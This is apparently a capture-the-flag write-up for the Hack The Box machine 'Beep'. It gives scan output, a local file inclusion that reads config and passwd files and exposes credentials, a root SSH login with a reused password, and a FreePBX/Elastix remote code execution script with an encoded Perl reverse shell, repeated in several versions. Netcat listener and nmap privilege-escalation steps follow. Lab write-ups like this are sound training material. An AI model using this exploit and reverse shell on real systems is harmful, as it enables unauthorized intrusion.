Beep
ip:
10.10.10.7 nmap results
Open 10.10.10.7:22
Open 10.10.10.7:25
Open 10.10.10.7:80
Open 10.10.10.7:111
Open 10.10.10.7:110
Open 10.10.10.7:143
Open 10.10.10.7:443
Open 10.10.10.7:10000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 adee5abb6937fb27afb83072a0f96f53 (DSA)
|_ 2048 bcc6735913a18a4b550750f6651d6d0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to [https://10.10.10.7/](https://10.10.10.7/)
110/tcp open pop3?
|*pop3-capabilities: USER IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE RESP-CODES TOP UIDL PIPELINING APOP STLS LOGIN-DELAY(0) EXPIRE(NEVER)
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 882/udp status
|* 100024 1 885/tcp status
143/tcp open imap?
|_imap-capabilities: NO Completed MULTIAPPEND UNSELECT STARTTLS ACL OK ID ANNOTATEMORE QUOTA LITERAL+ URLAUTHA0001 IDLE X-NETSCAPE THREAD=REFERENCES LISTEXT CONDSTORE CATENATE UIDPLUS LIST-SUBSCRIBED NAMESPACE IMAP4rev1 SORT=MODSEQ RENAME SORT RIGHTS=kxte BINARY ATOMIC CHILDREN THREAD=ORDEREDSUBJECT IMAP4 MAILBOX-REFERRALS
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
|*ssl-date: 2023-07-28T17:25:29+00:00; +1s from scanner time.
| http-robots.txt: 1 disallowed entry
|*/
|_http-server-header: Apache/2.2.3 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_http-title: Elastix - Login page
993/tcp open imaps?
|_imap-capabilities: CAPABILITY
995/tcp open pop3s?
3306/tcp open mysql?
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts: beep.localdomain, 127.0.0.1Elastix version: Elastix version 0.5
Elastix version 0.5Finding vuln:
searchsploit elastix
found multiple vuln
Solution 1 - LFI
searchsploit -m php/webapps/37637.pl
found an endpoint that is vulnerable to lfi.
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf&module=Accounts&action
found multiple creds.
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
#FOPRUN=true
FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjEuser
asterisk
asteriskuser
admin
rootpass
jEhdIekWmdjE
amp109
passw0rd
amp111So I’ve got bunch of user and pass.
now what?
but let’s see which are the users here by /etc/passwd . it will narrow the attack surface.
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.First thing you should look is that.
I tried to do ssh in my linux but it shows error. as the ssh client the box using is outdated and insecure, thats why my machine wasn’t connecting to it,
Solving this issue.
after few research i’ve found this solution.
make a directory at home dir
mkdir -p .ssh
now create a config file.
nano config
paste these things.
Host 10.10.10.7
#Legacy changes
KexAlgorithms +diffie-hellman-group1-sha1,diffie-hellman-group14-sha1
Ciphers +aes128-cbc
HostKeyAlgorithms=+ssh-dsshowever you can connect to it using putty.
user: root
pass: jEhdIekWmdjE
and we are in, as a root user.
root: f965360e0d402ce69bbb38566ddd2e8d
user: a290791a786a1bdcc8a59f81b4f3237a
Solution 2
— REMOTE CODE EXECUTION.
The Exploit db data base is too old. So i’ve found a new payload in github.
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
import urllib
import ssl
rhost="172.16.254.72"
lhost="172.16.254.223"
lport=443
extension="1000"
ssl._create_default_https_context = ssl._create_unverified_context
# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)change the lhost according to tun0 and lport and exploit
but i’m getting error.
So i made some changes.
The Python "ModuleNotFoundError: No module named 'urllib2'" occurs because the urllib2 module has been split into urllib.request and urllib.response in Python 3.
To solve the error, import the module as from urllib.request import urlopen.
modified payload
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
from urllib.request import urlopen
import ssl
rhost="10.10.10.7"
lhost="10.10.16.30"
lport= "4444"
extension="1000"
#ssl._create_default_https_context = ssl._create_unverified_context
# Reverse shell payload
url = 'http://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urlopen(url)
# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)Again another error.
As the ssl version of the website using is backdated V1. Modern web browser and libraries do not allow to connect to those website using outdated SSL protocol.
Hence I tried to modify script to bypass this ssl check but no luck.
I found a way that Rana Khalil was using, That is redirecting the traffic through burp and burp will forcefully redirect to the following website without SSL check.
And also we can check what’s going on in the background by checking the burp’s traffic.
To do this, on script, change the following
rhost= "localhost"
url = must change https to httpon burp change the following.
go to Proxy > Options > Proxy Listeners > Add.
In the Binding tab, set the port to 80.
In the Request handling tab set the Redirect to host parameter to 10.10.10.7,
Redirect to port parameter to 443 and check the option Force use of SSL.
So our Final Payload will looks like. this.
Final
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
# Modified by Rahi Islam.
# github: https://github.com/rahisec
############################################################
from urllib.request import urlopen
import ssl
rhost="localhost"
lhost="10.10.16.30"
lport=4444
extension="1000"
ssl._create_default_https_context = ssl._create_unverified_context
# Reverse shell payload
url = 'http://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urlopen(url)
# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)Now run it and also add a listener
nc -lnvp 4444It runs without error this time but still we don’t get the shell.
Let’s check in the burp request, what’s going on…..
The call failed. Maybe we need to change the default extension. As we don’t know which extension this app using . there is a tool which can detect valid extension in PBX. In particular the svwar tool identifies working extension lines on a PBX
Installing Sipvicious
pip install sipvicious
Now run the following command.
sudo sipvicious_svwar -m INVITE -e100-550 10.10.10.7
m: specifies a request method, INVITE
e: specifies an extension or extension range, in our case we set it to 100-550. if we don’t find any we will increase our range.
To be honest, I had to run the tool for several times to get this result. 🙂
I was getting these errors.
Ok. So we get the extension value that was using the app is 233
Final Payload
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
# Modified by Rahi Islam.
# github: https://github.com/rahisec
############################################################
from urllib.request import urlopen
import ssl
rhost="localhost"
lhost="10.10.16.30"
lport=4444
extension="233" #extension has been changed!
ssl._create_default_https_context = ssl._create_unverified_context
# Reverse shell payload
url = 'http://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urlopen(url)
# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)And here we go. Finally, We’ve got the initial Shell.
when we visit the webpage, it isn’t loading.
modify the minimum TLS version in Firefox
Open a new tab in Firefox.Enter "about:config" in the address bar and hit Enter/Return.
In the search box located above the list, enter "security.tls.version.min".
Locate the preference with the name "security.tls.version.min" and modify its value to ‘1’
Q.2.
TLS version:
developer tools > network > security
TLSv1
1.0
Q.2
What is the name of the software that's hosting a webserver on 443?
ElastixThe elastix softwere version disclosed.
found lang directory from directory bruteforce. visiting that dir, click on any lang, eg: cn.lang.
and the version is disclosed.
Last updated
Was this helpful?